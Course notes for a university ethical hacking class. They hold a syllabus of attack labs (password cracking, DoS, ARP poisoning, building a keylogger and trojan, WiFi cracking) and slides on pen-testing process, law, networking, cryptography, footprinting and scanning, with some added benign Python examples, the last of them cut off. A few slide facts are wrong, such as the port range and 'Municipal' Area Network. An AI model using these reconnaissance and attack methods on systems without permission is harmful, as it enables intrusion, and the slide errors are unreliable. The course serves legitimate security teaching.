EH JCE Class Notes

The document outlines a comprehensive course on Ethical Hacking, covering various units including the introduction to hacking, web vulnerabilities, network attacks, wireless hacking, and practical lab exercises. It emphasizes the importance of penetration testing methodologies, ethical considerations, and the legal framework surrounding cybersecurity practices. Additionally, it includes case studies and practical applications using tools like Burp Suite and Metasploit to enhance cybersecurity awareness and skills.

JCB1603 Ethical Hacking
1
UNIT-I Introduction To Hacking
Introduction to Hacking – Terminologies – Penetration Test – Vulnerability
Assessments versus Penetration Test – Pre-engagement – Rules of
Engagement - Penetration Testing Methodologies – OSSTMM – Categories of
Penetration Test – Types of Penetration Tests – Vulnerability Assessment
Summary – Reports - Red, Blue, and Purple Teams.

UNIT-II Ethical Hacking In Web


Introduction to Ethical Hacking – Foot Printing - Reconnaissance - Scanning
Networks - Enumeration - System - Malware Threats – Sniffing- Social
Engineering - Denial of service - Session Hijacking - Hacking Web Servers -
Web Applications – SQL Injection - Hacking Wireless Networks - Mobile
Platforms.
2
UNIT-III Network Attacks
Vulnerability data resources – Exploit databases –Promiscuous versus Non-
Promiscuous Mode – MITM attacks – ARP attacks –SSL Strip: Stripping https
Traffic - DNSS – ARP Spoofing – DHCP Spoofing - Remote Exploitation –
Attacking Network Remote Services – Overview of Brute Force Attacks.

UNIT-IV Wireless Hacking


Wireless hacking – Aircrack – Cracking WEP – WPA/WPA2 Wireless Network
Using Aircrack – Evil Twin Attack – Log-in Protection Mechanisms – Captcha
Validation Flaw – Captcha RESET Flaw – Manipulating User-Agents to Bypass
Captcha.

3
UNIT-V Case Study
Authentication Bypass Attacks – Testing for Vulnerability – Automating with
Burp Suite – Session Attacks – SQL Injection Attacks – XSS (Cross-Site Scripting)
- Types of Cross-Site Scripting – Cross-Site Request Forgery (CSRF) – SSRF
Attacks.

4
JCB1613 Ethical Hacking Lab
5
A) Ethical Hacking In Web:
Foot printing and Reconnaissance:
Performing Foot Printing using Google Hacking, Website Information,
Information about an archived website,
1. Extract Contents of a Website
2. Trace any Received Email
3. Fetch DNS Information.
B) Malware Threats: Worms, Viruses, Trojans:
1. Use Password Cracking, Dictionary Attacks.
2. Encrypt and Decrypt Passwords.
3. Simulate DoS Attack to Reduce the Speed of Website: Tool- HTTP Flooder.
4. ARP Poisoning in Windows, Ifconfig, ping, netstat, traceroute,
Steganography Tools.
5. Exploit an Attack on Computer System using IP Tools; Reverse IP Attack.
6
C) Developing and Implementing Malware:
1. Creating a Simple Keylogger in Python, Creating a Virus, Creating a Trojan.
Scanning Networks, Enumeration and Sniffing:
i). Generate reports using Network port scanning, IDS tools, and sniffing tools.
ii). Practical of Nmap Security Scanner for Network Exploration & Security Audits.
iii). Network Level Hijacking.

7
D) Ethical Hacking Web Servers, Web Applications:
1. Hacking a Website by Remote File Inclusion, Disguise as Google Bot to view
hidden content of a website.
2. Practical on Session Hijacking.
3. Phishing - Practical on Social Engineering.
4. Exploit SQL Injection Vulnerabilities using PySQL - Python Framework or
similar. Tools: sqlmap.
5. Practical on Cross Site Scripting (XSS).
6. Practical on Server Side Request Forgery (SSRF).
7. Practical on Cross Site Request Forgery (CSRF).
8. Android hacking.
9. Burp Suite, a tool for performing security testing of web applications.
8
E) Wireless Network Hacking:
1. Hacking Wireless Networks: Email Tracker - to Trace the Route of any Email
or IP. Tools: Ip Locater, Email_Spidr, Aid4Mail.
2. Wifi Crack - to Crack the Keys of wifi. Tools: aircrack (Linux), Cain & Abel
(Windows), LAN Guard, Wireshark, BurpSuite.

F) Penetration Testing:
1. Penetration Testing using Metasploit.

9
Acknowledgement
We acknowledge that this course content is drawn from CyBOK, the Cloud Security
Alliance (CSA) and publicly available, open source content, used for knowledge
sharing to improve cyber security awareness among users.

CyBOK project is “for the community, by the community”

The Cloud Security Alliance (CSA) is a non-profit organization that brings together experts and
community to build best practices and push forward cybersecurity for everyone.
https://www.isaca.org/

https://www.cybok.org/knowledgebase1_1/

https://www.cisa.gov/

https://attack.mitre.org/

https://github.com/cloudsecurityalliance

https://cloudsecurityalliance.org/

https://learn.microsoft.com/en-us/azure/security/fundamentals/overview
11
1: Introduction to Ethical Hacking

12
Definition of a Penetration Tester
• Sometimes called ethical hackers, though the label is less preferred
• People who assess the security of a target
Pen testers are:
• Specially trained
• People who understand security concepts
13
What Is a Penetration Tester?
• Can be employed full-time by a company
• May work freelance as a contractor
• Uses the techniques of malicious hackers against a
client
• Tactics and tools of pen tester are the same as a
hacker
• Intent and permission differ

14
Why Use Penetration Testing?
Taking on the pen tester role and the associated skillset has become more
important in today’s world as organizations have had to take a more serious
look at their security posture and how to improve it.
• To test and evaluate security
• To ensure compliance with laws
• To perform security audits
• To monitor

15
Origins of Penetration Testing
The term hacker is an old one that can trace its origin back about 50 years to
technology enthusiasts of the 1960s. These individuals were not like the
hackers of today; they were simply those who were curious and passionate about
new technologies and spent time exploring the inner workings and limitations
of early systems.
• Evolved from traditional hacking
• Arose from a need to proactively assess an organization’s security
• Created in response to hacker activity
• Increasingly popular with rise in cybercrime

16
Goals of a Penetration Tester
In any organization that is security minded, something known as the CIA triad
(or the core principles of confidentiality, integrity, and availability) is
trying to be preserved.
• Confidentiality
• Integrity
• Availability
17
Goals of a Penetration Tester
Testers work to find holes in the client’s environment that would disrupt the
CIA triad and the way it functions. Another way of looking at this is through
the use of something called the anti-CIA triad.
• Disclosure
• Alteration
• Disruption
18
Overview of Pen Testing

Hackers
• Have existed since the 1960s
• Originally technology enthusiasts

Original Hackers
• Tried out new technology
• Pushed boundaries
• Satisfied their curiosity
• Sought out undocumented features
19
Evolution of Internet
Hackers became more prolific and more dangerous not too long after the
availability of the Internet to the general public.
• Introduction of the Internet expanded possibilities and range
• First attacks were mostly mischievous and benign
• Later attacks became malicious
• Newer attacks include financial fraud, piracy, credit card theft

20
Opponents
In the “real world,” hackers tend to be broken down into different categories
to differentiate their skills and intent. These are the different types of
hackers you can expect to encounter in the real world.
• Script kiddies
• White Hats
• Black Hats
• Gray Hats
• Malicious hackers
• Terrorists

21
Examples of Cybercrimes
Over the past two decades crimes associated with hacking have evolved
tremendously. These are some broad categories of cybercrime.
• Identity theft
• Theft of service
• Fraud
• Embezzlement
• Writing malware
• Cyberstalking
22
Target: Apple iCloud
In August 2014, a massive data breach against Apple’s iCloud
was responsible for the public disclosure of hundreds of
celebrity pictures in various intimate moments. This breach
has so far resulted in lawsuits by many of those who had their
pictures stolen as well as a lot of negative publicity for Apple.
• Hackers broke into Apple’s cloud-based storage service.
• Several celebrities had their photos stolen and posted online.
• This breach resulted in numerous ongoing lawsuits.

23
Target 2014
In 2014 Target Corp became a victim of a large-scale cybercrime. This breach
was responsible for the disclosure of an estimated 56 million different credit
card accounts.
• The breach resulted in loss of customer data.
• 56 million records were compromised during the incident.
• The breach resulted in major lawsuits.
• There was a decrease in business.
24
JP Morgan 2014
In October 2014 JP Morgan revealed to the U.S. Securities and Exchange
Commission (SEC) that 83 million accounts were compromised. The breach is being
actively investigated by the U.S. Secret Service. Early information points to
the breach being the result of attackers discovering vulnerabilities in
software on JP Morgan’s own computer systems.
• 83 million accounts compromised
• Being actively investigated by SEC in the United States
• Generated numerous lawsuits
• Loss of customers
25
Hacking and the Law

New and old laws apply to hacking.

Technology has outpaced the law.

Increasing amount of cybercrimes.

Cybercrimes have rapidly evolved.

26
Addressing Legal Issues
You will need to always ensure that the utmost care and concern is exercised
at all times to ensure that the proper procedures are observed to avoid legal
issues.
• You need trust between the client and pen tester.
• The client needs to have confidence contract rules will be followed.
• The client needs limits and guidelines in the event they are broken.
27
Sample Laws
• 1973 US Code of Fair Information Practices
• 1974 US Privacy Act
• 1984 US Medical Computer Crime Act
• 1986 US Electronic Communications Privacy Act
• 1994 US Communications Assistance for Law Enforcement Act
• 1996 US Computer Fraud and Abuse Act
• 1996 US Health Insurance Portability and Accountability Act (HIPAA)
• Sarbanes-Oxley (SOX)
• Cyberlaw
• Federal Information Security Management Act (FISMA)
28
Points to Remember
Remember as a pen tester that the law will impact your
actions and can result in prison time and/or fines if you do
things without permission.
Do not attempt to become an “armchair” lawyer. Rather,
understand that the law has an impact on what you do. Seek
legal assistance if you don’t fully understand the implications.
• The law will impact and guide many penetration tests.
• Seek legal assistance from a lawyer; don’t try to
interpret the law yourself.

29
Pen Testing Process
Once a pen tester is in possession of the necessary permissions to conduct
their activities, the actual testing can take place. There are a myriad of ways
to proceed with testing at this point, and each is valid in its own way.
• Follows a series of steps
• Ensures tasks and goals are completed properly
• May vary based on need
• May be legally mandated
• Can be customized in some cases
30
Pen Testing Process
Reconnaissance → Scanning → Enumeration → System Hacking → Privilege
Escalation → Planting Backdoors → Covering Tracks

31
Conclusion of the Test
Once this is complete, the tester should be prepared to present a detailed
report of their findings. Presenting the report to the client may be the last
task the tester has or there may be additional steps.
Potential outcomes:
• Presentation of the report to the client
• Presentation plus recommendations
• Presentation plus recommendations with remediation
32
2: System Fundamentals

33
Operating Systems
The operating system provides many features, but look underneath the interface
and you will find the platform responsible for the applications being executed.
OS Features:
• OS requires intimate familiarity
• Performs diverse functions
• Works with hardware
• Acts as platform for all applications
• Provides monitoring and management
34
Common OS Features
• Graphical User Interface
• Network Support
• Multitasking
• Application Support
• Hardware Interface

35
Microsoft Windows
The majority of the systems will be running
Microsoft Windows in some form.
• The dominant OS
• Debuted in 1980s
• Installed on PCs and other devices
• Installed on 90% of computers

36
Windows Security Issues
• Windows is a huge target because of a large
installed base.
• An endless stream of countless updates is hard
to keep track of.
• The default configuration is left in place by
many consumers.
• A large number of older or legacy systems still
exist.

37
Apple’s Mac OS X
• Has replaced Windows systems in some environments
• Coexists in many environments
• Popular in environments where other Apple products exist
• Apple’s proprietary OS

38
Issues with Mac OS X
• The security solutions are lacking versus other
platforms.
• There is naivety among users who feel that
vulnerabilities do not exist.
• Features are generally all enabled and ready to
use even if the user is not using them.

39
Linux
• Advanced operating system suited to tech enthusiasts
• Popular among techies, but also useful as a desktop OS
• Popular with pen testers
• Widely used as a server OS

40
Facts About Linux
• Higher level of knowledge required
• Least privilege is the default security model
• Open source allows for scrutiny by public
• Extremely flexible
• Present on many embedded devices

41
Next Step, Networks
A pen tester must understand the dynamics of
networks.

Networks have clients and servers.

Servers provide services and data.

Clients are where users work.

42
Network Types
Networks come in four different sizes, with each based on scale. Knowing each
of the different types of networks is absolutely essential in planning and
executing a successful penetration test.
• Personal Area Network (PAN)
• Local Area Network (LAN)
• Municipal Area Network (MAN)
• Wide Area Network (WAN)
43
Enter the OSI Model
• Stands for Open System Interconnect
• Old but useful model
• Conceived in 1970s
• Defines a common set of rules for vendors of hardware and software
• Useful in placing attacks and other components into proper context
44
Seven Layers of OSI
Application
Presentation
Session
Transport
Network
Data Link
Physical
45
TCP/IP
A suite of networking protocols used to exchange
information

OSI influenced, but didn’t create TCP/IP

Is one of many network protocols

• Is most popular
• Other protocols are essentially extinct

46
TCP vs. UDP
Transmission Control Protocol (TCP): Reliable; Connection oriented
User Datagram Protocol (UDP): Unreliable; Connectionless
A packet is a chunk of information transmitted over the network
47
TCP Three-Way Handshake
The three-way handshake is a process that TCP uses to initiate a connection
between two points.
48
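The handshake described above, as an added Python example that is not from the course slides: each side is modelled as an endpoint that tracks its state and sequence numbers, and the three segments (SYN, SYN-ACK, ACK) are checked the way RFC 793 requires. The Endpoint and Segment classes, host names and initial sequence numbers are constructed for illustration.

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

# Constructed illustration of the TCP three-way handshake (not from the slides):
# a segment carries flags, a sequence number and, once known, an ack number.
# RFC 793 rule used throughout: a SYN consumes one sequence number, so the
# reply acknowledges seq + 1.


@dataclass
class Segment:
    src: str
    dst: str
    flags: FrozenSet[str]      # e.g. {"SYN"}, {"SYN", "ACK"}, {"ACK"}
    seq: int
    ack: Optional[int] = None


class Endpoint:
    """One side of the handshake, tracking state and sequence numbers."""

    def __init__(self, name: str, isn: int, listening: bool = False):
        self.name = name
        self.snd_nxt = isn                    # next sequence number we will send
        self.rcv_nxt: Optional[int] = None    # next sequence number expected from peer
        self.state = "LISTEN" if listening else "CLOSED"

    # Step 1 (client): SYN carrying the client's initial sequence number x.
    def send_syn(self, peer: str) -> Segment:
        seg = Segment(self.name, peer, frozenset({"SYN"}), self.snd_nxt)
        self.snd_nxt += 1                     # the SYN itself occupies seq x
        self.state = "SYN-SENT"
        return seg

    # Step 2 (server): SYN-ACK with its own ISN y and ack = x + 1.
    def answer_syn(self, syn: Segment) -> Segment:
        if self.state != "LISTEN" or syn.flags != {"SYN"}:
            raise ValueError(f"{self.name}: unexpected segment in state {self.state}")
        self.rcv_nxt = syn.seq + 1
        seg = Segment(self.name, syn.src, frozenset({"SYN", "ACK"}),
                      self.snd_nxt, self.rcv_nxt)
        self.snd_nxt += 1
        self.state = "SYN-RECEIVED"
        return seg

    # Step 3 (client): verify the SYN-ACK acknowledges x + 1, then ACK y + 1.
    def complete(self, synack: Segment) -> Segment:
        if self.state != "SYN-SENT" or synack.flags != {"SYN", "ACK"}:
            raise ValueError(f"{self.name}: unexpected segment in state {self.state}")
        if synack.ack != self.snd_nxt:
            raise ValueError(f"{self.name}: bad ack {synack.ack}, expected {self.snd_nxt}")
        self.rcv_nxt = synack.seq + 1
        self.state = "ESTABLISHED"
        return Segment(self.name, synack.src, frozenset({"ACK"}),
                       self.snd_nxt, self.rcv_nxt)

    # Server side of step 3: the final ACK must acknowledge y + 1.
    def accept_ack(self, ack: Segment) -> None:
        if self.state != "SYN-RECEIVED" or ack.flags != {"ACK"} or ack.ack != self.snd_nxt:
            raise ValueError(f"{self.name}: final ACK rejected in state {self.state}")
        self.state = "ESTABLISHED"


def three_way_handshake(client_isn: int = 1000,
                        server_isn: int = 5000) -> Tuple[List[Segment], str, str]:
    """Run the full exchange; returns the three segments and both end states."""
    client = Endpoint("client", client_isn)
    server = Endpoint("server", server_isn, listening=True)
    syn = client.send_syn("server")
    synack = server.answer_syn(syn)
    ack = client.complete(synack)
    server.accept_ack(ack)
    return [syn, synack, ack], client.state, server.state


def half_open_after_syn(client_isn: int = 1000, server_isn: int = 5000) -> str:
    """A SYN that is never completed leaves the server waiting in SYN-RECEIVED.
    Half-open connections of this kind are what a stateful firewall or IDS
    counts when it watches for SYN floods or incomplete scans."""
    client = Endpoint("client", client_isn)
    server = Endpoint("server", server_isn, listening=True)
    server.answer_syn(client.send_syn("server"))
    return server.state


def wrong_ack_is_rejected() -> bool:
    """A SYN-ACK whose ack number is not x + 1 is refused by the client."""
    client = Endpoint("client", 1000)
    client.send_syn("server")
    forged = Segment("server", "client", frozenset({"SYN", "ACK"}), seq=5000, ack=4242)
    try:
        client.complete(forged)
    except ValueError:
        return True
    return False
```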
Working with UDP
User Datagram Protocol:
• Does not have error checking or acknowledgments like TCP
• Stateless or connectionless protocol
• Less overhead than TCP

49
IP Addresses
An IP address is a unique numeric identifier assigned to a host.
Hosts are something attached to a network.
A device attached to a network with an IP address is a host.
Every packet has a source IP and destination IP.

50
Examples of IP Addresses
Some simple examples of an IP address:
10.15.1.15
169.254.20.16
192.168.1.1
127.0.0.1
Each one of these addresses is considered a valid IP address, and each would
be legal in their own individual situation.
51
IP Address Format
• Written in dotted decimal format: separated by periods
• Four numbers separated by decimal points, e.g. 210.168.69.2
• IP address is made up of network and host: network, then host
52
Types of IP Addresses
IP addresses by type: Public, Private
IP addresses by assignment: Static, Dynamic
53
Types of IP Addresses
IP Address = Network + Host
Subnetting is the logical breakdown of a network address space into smaller
subnetworks.
54
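The address format, network/host split, public/private types and subnetting covered on the last few slides, as an added Python example that is not part of the course material: it uses the standard library ipaddress module, and the sample addresses (the slides' own examples plus 210.168.69.2) are constructed inputs.

```python
import ipaddress
from typing import Dict, List

# Added example (not from the course slides): the standard ipaddress module
# applied to the points above: dotted-decimal format, the network/host split,
# public vs. private addresses, and subnetting. Sample addresses are constructed.

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def to_binary_octets(addr: str) -> str:
    """Show the four dotted-decimal octets as 8-bit binary groups."""
    ip = ipaddress.IPv4Address(addr)
    return ".".join(f"{octet:08b}" for octet in ip.packed)


def classify(addr: str) -> str:
    """Label an address the way scan results are usually triaged."""
    ip = ipaddress.IPv4Address(addr)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local (APIPA)"
    if any(ip in net for net in RFC1918):
        return "private (RFC 1918)"
    if ip.is_global:
        return "public"
    return "reserved/other"


def split_network_host(addr: str, prefix: int) -> Dict[str, object]:
    """Separate an address into its network portion and host portion."""
    iface = ipaddress.ip_interface(f"{addr}/{prefix}")
    net = iface.network
    return {
        "network": str(net.network_address),
        "prefix": net.prefixlen,
        "netmask": str(net.netmask),
        "host_part": int(iface.ip) & int(net.hostmask),  # host bits as an integer
        "host_bits": 32 - net.prefixlen,
        "usable_hosts": max(net.num_addresses - 2, 0),   # minus network and broadcast
        "broadcast": str(net.broadcast_address),
    }


def subnet(network: str, new_prefix: int) -> List[str]:
    """Break an address space into equal smaller subnetworks (the slide's subnetting)."""
    net = ipaddress.ip_network(network, strict=True)
    return [str(s) for s in net.subnets(new_prefix=new_prefix)]
```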
About Ports
Ports identify and categorize types of traffic.

Each port is associated with a protocol or application.

Ports ensure traffic will end up at the right location.

They are represented in the format 192.168.1.10:80.

55
Port Ranges (TCP and UDP)
Well-known ports: 1 to 1024
Registered ports: 1025 to 49151
Dynamic ports: 49152 to 65535

56
Network Hardware
Networks contain various appliances.
Each controls the flow of traffic.
Having a basic overview of each is essential to a penetration tester.

57
Routers and Switches
Routers and switches are commonly used devices in networks.
Routers create and connect networks.
Switches create multiple broadcast domains.
A solid understanding of the functions of routers and switches will give you a
substantial edge when ferreting out information on a target network.
58
What Is a Router?
Directs packets to the proper network and address
Works at the network layer
Works as a gateway between networks
Routers can use Network Address Translation (NAT)
• Used to translate a few public IPs to numerous private IPs

59
Looking at Switches
Deliver data based on hardware or physical address
• MAC addresses are physical addresses in a network card
• Come in the form of six pairs of characters in hexadecimal form
• C0-cb-38-ad-2b-c4
Create collision and broadcast domains

60
Proxies
Protect internal systems

Intermediaries between internal and external networks

Can filter content such as websites or other aspects

Can cache content

61
Firewalls
• Control flow of traffic
• Caching of content
• Content filtering
• Examine traffic headers
Come in two main types:
• Packet filtering
• Stateful packet filtering

62
Placement of a Firewall

63
Intrusion Detection System
Intrusion detection system (IDS):
• Detects but doesn’t stop malicious activity
• Can send an alert or log an event
• Is a passive device
Intrusion prevention systems (IPSs) are like IDSs but react to activity

64
3: Cryptography
66
Goals of Cryptography
• Confidentiality
• Integrity
• Nonrepudiation
• Authentication

67
Uses of Cryptography
Applications of cryptography
Symmetric and asymmetric cryptography
Working with hashing
Purposes of keys
Types of algorithms
Key management issues

68
Understanding Cryptography
• Legal issues
• Financial compliance
• Healthcare regulations
• Defense industries
• Acceptable algorithms
• Key strengths

69
What Is Cryptography?
As information has changed and human beings have gotten smarter, the
technology has become substantially more advanced to keep up with changing
issues and threats.
What does it do?
• Protects information
• Way of blocking threats to secrecy
• Preserves the state of information
• A constantly evolving body of knowledge
70
Hieroglyphics as an Example
Intricate patterns and glyphs used in Egyptian hieroglyphics were commonly
used for spiritual and religious reasons.
• Egyptian hieroglyphics had spiritual and religious significance
• Not designed to preserve secrets
• Used to commune with other world
• Usage restricted to royal family and religious orders
• Could not be deciphered again until 1799 and discovery of Rosetta stone

71
Modern Applications of Cryptography
Cryptography has even made some of the everyday technologies that you use
possible.
E-commerce applications:
• Couldn’t exist in current form without cryptography
• Provides secrecy, integrity, and authentication
Mobile technologies:
• Prevents identity theft
• Stops device duplications
• Prevents eavesdropping
72
Important Terms and How They Work

Plaintext or cleartext

Ciphertext

Algorithms

Keys

73
Introducing Symmetric Cryptography
All algorithms that fit into the symmetric variety use a single key to both
encrypt and decrypt (hence the name symmetric).
Symmetric systems are great at:
• Confidentiality
• Speed
• Overall simplicity
• Providing authenticity
Drawbacks of symmetric systems:
• Key management
• Lack of non-repudiation capability

74
Examples of Symmetric Algorithms
There are currently a myriad of symmetric algorithms
available; a Google search turns up an endless sea of
alphabet soup of algorithms.
Data Encryption Standard (DES)
Triple DES (3DES)
Blowfish
International Data Encryption Algorithm (IDEA)
RC2, RC4, RC5, RC6
Rijndael or Advanced Encryption Standard (AES)
Twofish
75
Asymmetric or Public Key Cryptography
The concept of public key cryptography was intended to overcome key management
problems in previous systems. In the system each user receives a pair of keys
called the public key and the private key. Each person’s public key is
published, whereas the private key is kept secret.
• Uses a key pair consisting of a public key and a private key
• Ensures non-repudiation
• Can enforce authentication
• Solves key management issues
• Is slower compared to symmetric systems
76
Asymmetric Encryption
Encryption: Hello → Encryption Algorithm (Key 1) → $%@@!
Decryption: $%@@! → Decryption Algorithm (Key 2) → Hello
77
About that Hash
A hash is a one-way function
Can be computed in one direction and not the other
Is a fixed length
Creates a unique output for every input

78
Hashing Algorithms
Hashing is used to detect changes in information: anything
that is hashed and then changed, even a small amount, will
result in an entirely different hash from the original.
Message Digest 2 (MD2)
Message Digest 4 (MD4)
Message Digest 5 (MD5)
Message Digest 6 (MD6)
HAVAL
RIPE-MD
Secure Hash Algorithm-0 (SHA-0)
Secure Hash Algorithm-1 (SHA-1)
Secure Hash Algorithm-2 (SHA-2)
79
Hashing in Digital Signatures
1. Sean creates a message.
2. Sean hashes the message.
3. Sean encrypts the hash with his private key.
4. Sean sends the combination to Zelda.
5. Seeing who the sender is, Zelda retrieves Sean’s public key.
6. Zelda decrypts the hash value, thus validating the identity of the sender.
7. Zelda reruns the algorithm against the plaintext and compares the two.
8. If the hashes match, the message has not been altered.
9. Zelda sees that the message came from Sean.
80
The Role of Digital Certificates
A digital certificate complements or replaces other forms of authentication. A
user who presents the credential must have a method in place that allows for
the credential to be validated.
• Digital certificates establish ownership of a key
• Can be attached to a person, computer, or service
• Certificates are issued under specific rules
• Used in many applications such as e-commerce

81
Certification Authorities
A certification authority (CA) handles digital
certificates.

A CA can revoke a certificate.

A CA will validate a certificate.

Trusted third party is a name used to describe a CA.


82
Building a PKI System

83
Applications of Cryptography: IPSec
• Internet Protocol Security (IPSec) protects data during transmission
• Operates at the Network layer
• Very widely used
• Present in virtual private networks (VPN)
84
Applications of Cryptography: PGP
• Designed to provide security in online communications
• Similar to public and private key encryption
• Is used to both sign and encrypt communications
• Can be used to protect data files on hard drive or other media
85
Applications of Cryptography: Secure Sockets Layer
• Developed by Netscape in 1990s
• Standard for exchanging secure data
• Encrypts information prior to transmission
• Decrypts upon receipt
• Combines asymmetric and symmetric systems
86
Summary
• Understanding cryptography is important to
progressing into pen testing.
• Cryptography keeps data and services safe.
• Cryptography provides confidentiality, integrity,
non-repudiation, and authentication services.
• Technologies such as SSL, IPSec and others
would not be possible without cryptography.

87
4: Footprinting

88
Losing Control of Information
• Business loss
• Information leakage
• Privacy loss
• Corporate espionage

89
What Is Footprinting?
The process of researching and uncovering details about your target will take
some time to complete, but the time will be well spent if it helps you refine
your actions later to make them more effective.
• Process of researching a target carefully and looking for useful information
• Uncovering detailed information
• Looking for information that may be useful during later steps
• Using publicly available resources to gain information
• Looking for carelessly or thoughtlessly shared information in places such as
social networking sites
90
What Types of Information to Look For?
• Technical sources such as network information,
applications, IP address ranges, and device information
• Administrative information such as organizational
structure, policies, hiring procedures, employee
information, phone directories, and more
• Physical details such as location data, facility data,
people details, and social interactions

91
How to Gather Information
Passive methods are those that do not interact with the target.
Active methods are those that directly engage the target, such as using phone
calls.
Open source intelligence (OSINT) consists of those sources such as newspapers,
websites, press releases, and other sources.
92
Examining a Company’s Website
• Look for e-mail addresses that may tell more about a specific individual.
• Try to find a physical address (can be useful when looking up a location on
mapping services or Google’s streetview).
• Careers and job skills required can reveal a company’s internal needs.
• Product, project, or service information.
93
Examining a Website Offline
Downloading content to a local drive allows for a much closer and detailed
examination of website content than may be possible when viewing the website
online through a browser.
• Examining a website can be made easier by copying it to a local drive.
• Allows you to search the files and information within at your leisure.
• Website downloaders are designed to perform this task.
94
What Can BlackWidow Do?
• What can it download?
• Scriptable
• Network Spy
• Snapshot of web pages
• Scan filters
• Support for customizable scans
95
Downloading Sites with Wget
• Stands for Web Get
• Is available on just about every major platform
• Is noninteractive
• Can work with slow or unreliable networks

96
What Else to Learn from a Website
What about subdomains? Try locating a division of the main website such as
beta.microsoft.com.
• Subdomains are common but not always easily detectable
• They can be used to hide content.
• They can also be used to delegate control to parts of a company.
Subdomains are a child of a website name. For example, a subdomain of
Microsoft.com would be support.microsoft.com or beta.microsoft.com.
97
Finding Old Versions of Websites
• Sometimes an old and
long since removed
version of a website
needs to be located.
• Using Archive.org these
websites can be located.
• Archive.org features the
Wayback Machine for
viewing old sites.
• Can be useful in locating
information that a
company realized was a
bad idea to publish and
removed.
98
What About Google?
• Search engines provide quick access to information, but not all.
• Search engines show only a small fraction of available information.
• Additional information is available with extra effort.
• Google hacking is used to retrieve this hidden information.
99
Google Hacking Keywords
cache will display the version of a web page that Google contains in its
cache.
• Usage: cache:<website name>
link is used to list any web pages that contain links to the page in the
query.
• Usage: link:<website name>
site will restrict the search to the location specified.
• Usage: <keyword> site:<website name>
allintitle will return pages with specified keywords in their title.
• Usage: allintitle:<keywords>
allinurl will only return results with the specific query in the URL.
• Usage: allinurl:<keywords>
100
Using Google Alerts
Alerts are a feature present in many search engines that
notify you when something that fits your search criteria has
been posted.
• Google alerts are a customized automated search.
• They can be built to look for details that are useful.
• They can be used to keep an eye on a search while you
work on other tasks.
• Up to 1,000 alerts can be assigned to an e-mail address.

101
Searching for People
Spokeo: www.spokeo.com
Pipl: www.pipl.com
Yasni: www.yasni.com
Zabasearch: www.zabasearch.com
Intelius: www.intelius.com
ZoomInfo: www.zoominfo.com
Infospace: www.infospace.com
KGB: www.kgbpeople.com
People: www.peepdb.com
Radaris: www.radaris.com

102
Determining Location
• Google Earth
• Google Maps
• Google Streetview
• Webcams

103
Using Social Networking
Because of the nature of these services and their tendency to skew toward
openness and ease of sharing information, an attacker does not have to put in
a tremendous amount of work to learn useful details.
• Useful tool for information gathering
• Common to encounter over-sharing of information accidentally or deliberately
• Easy to encounter information leakage
• Drawback is openness of networks
• Easy to collect information
104
Popular Social Networking Sites
There are several social networks you can use to search for information, each
with its own built-in search function allowing you to read people’s
information. In addition, we also locate it based on geographic data.
• Facebook
• Twitter
• Google+
• LinkedIn
• Instagram
• Tumblr
• YouTube
105
Using Echosec to Mine Social Networking
Services such as Facebook, Twitter, and Instagram can include
information from the GPS included in your smartphone or use
location services on your laptop or tablet to embed location data.

YouTube
Twitter
Foursquare
Instagram
Picasa
Panoramio
Flickr
106
Looking Up Financial Information
Services such as Yahoo, Google, CNBC, USA Today, and countless others provide
information about a company that may not be readily available through other
means.
• Financial data can reveal useful information about a company.
• Public companies can be searched via stock symbol.
• Competitors may also have useful information about the target.
• Look for a company’s partners.
• Look up press releases.
• Find office locations.
107
Using Job Sites
If you have browsed job postings, you have undoubtedly noticed the myriad of
forms these things take, but one of the common items is the skills and
experience section.
• Job requirements and experience
• Employer profile
• Employee profile
• Hardware information
• Software information
108
Working with Email as an Information Source
For a malicious party and a pen tester, the information carried by this medium
is staggering and is valuable to an attacker looking for information of all
types.
• Value is in email’s content and volume
• Politemail can allow for the tracking of information
• WhoReadMe can also allow for the tracking of email
• OS, browser type, and installed ActiveX controls can be found in email

109
Using Whois
Whois is a utility designed to allow you to collect information about a domain name or IP address block.
• Cross-platform utility for looking up domain registration information
• Can collect information that may not be located elsewhere
• Includes address information, phone numbers, names, and nameserver information
• Should be cross-checked, as registration details may be anonymized (privacy-protected) or simply inaccurate

Social Engineering
Inside every environment is the human being. This is in most cases the weakest and easiest component to target, and one of the easiest places to extract information from.
• Baiting
• Phishing
• Spear phishing
• Pretexting
• Tailgating
• Eavesdropping
• Shoulder surfing
• Dumpster diving

Summary
• Wealth of resources for gaining information.
• Most are easily accessible.
• Research should be meticulous.
• A healthy amount of time should be spent on footprinting.
• Thorough research will pay off later.
• Be mindful of documentation.

5: Scanning

The Role of Scanning
Each scan type is like a piece of a larger puzzle that can be assembled to gain a clearer view of the overall target.
• Ping sweep
• Port scanning
• Vulnerability scanning

Getting Started with Scanning
Network scanning is an intense and methodical process of uncovering the structure of the network and the hosts on it. The information gathered here can refine the enumeration process later.
• IP addresses of live systems
• Lists of open and closed ports
• Operating system versions
• MAC addresses
• Service information
• Port data

Target Up or Down
• Important to locate which systems are online
• Not every address in a range of IP addresses is "on"
• Need to separate systems that are off from those that are on
• Scans to locate "on" or "off" systems are called ping sweeps or ICMP scans

A quick way to check for live systems is to use the ping utility to perform a ping sweep or ICMP scan. Pinging is the process of using the ping command to ascertain the status of a given system, specifically whether it is responsive or not. Note that a host (or a firewall in front of it) that drops ICMP will look "off" to a ping sweep even though it is up, so a missing reply is not proof that a system is down.

What Does a Ping Look Like?
Ping is used diagnostically to ensure that the host the user is trying to reach is actually operating. Ping works by sending an Internet Control Message Protocol (ICMP) Echo Request (type 8) to a specified interface on the network and waiting for an Echo Reply (type 0).
• Ping is a common network diagnostic utility
• Used to diagnose network problems
• Present in every operating system
• Uses the Internet Control Message Protocol (ICMP)
• Sends a packet to a remote system and waits for a response
• If no response arrives within a set time, the target is listed as unreachable

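What a ping actually puts on the wire, as an added example that is not part of the course notes: the code below builds the ICMP Echo Request a ping sweep sends, computes the RFC 1071 checksum, and checks the Echo Reply a live host returns against the request it belongs to. Sending it needs a raw socket (root or administrator), so the block only builds and verifies packets; the identifier, sequence number, payload and address block are made up for the demonstration.

```python
import ipaddress
import struct

ICMP_ECHO_REQUEST = 8   # "are you there?"
ICMP_ECHO_REPLY = 0     # "yes, here I am"
ICMP_HEADER = struct.Struct("!BBHHH")   # type, code, checksum, identifier, sequence


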